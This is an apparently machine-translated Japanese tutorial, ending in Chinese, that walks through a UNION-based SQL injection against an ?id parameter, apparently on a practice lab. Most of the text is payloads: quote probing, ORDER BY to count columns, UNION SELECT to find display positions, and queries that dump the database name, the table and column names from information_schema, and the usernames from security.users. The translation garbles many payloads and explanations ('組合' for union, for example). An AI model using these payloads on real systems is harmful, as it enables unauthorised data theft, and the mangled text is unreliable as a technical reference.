まず、射出タイプが決定されます
(1)まず、パラメータIDを渡す要求、及びデジタルタイプの要件;? ID = 1を参照してください
(2)入力してください?ID = 1 '
検出されたエラー
(3)入力?ID = 1 ''
与えられた単一引用符、二重引用符通常の表示には、文字の決意を注入します。
2列の数の決意
?+ - 1(1)入力されたID = 1「オーダー( - +あるコメント文)
?2(2)入力されたID = 1「オーダー - +
?(3)入力されたID = 3により1「オーダー - +
?4の(4)入力されたID = 1「オーダー - +
3を持っているので、分析
3.表示位置を確認すると、手の注入の位置を決定します
(1)入力されたID = -1「組合は1,2,3を選択? - +(クエリのユニオン継手噴射パラメータを用いて、組合後組合の前面に与えられるパラメータは、データを実行こうしてIDを読み取る= ID = 1で注入-1)
図3は、この時点で手の注意の位置であってもよいし、表示位置である3
4.注入
?、1を選択し、ID = -1「組合データベース()、3 - +:(1)現在のデータベースの名前を書き留め
(2)爆注册表ID = -1' 組合1、GROUP_CONCAT(TABLE_NAME)を選択し、3 TABLE_SCHEMA = "セキュリティ" INFORMATION_SCHEMA.TABLESから - 。?+
(3)注フィールドの特定のテーブルへのユーザー例:ID = -1「組合1、GROUP_CONCAT(COLUMN_NAME)を選択し、3 table_nameは "ユーザー" = information_schema.columnsから - +を?
(4)注字段的值,这里以users表里的username为例:?id=-1' union select 1,group_concat(username),3 from security.users --+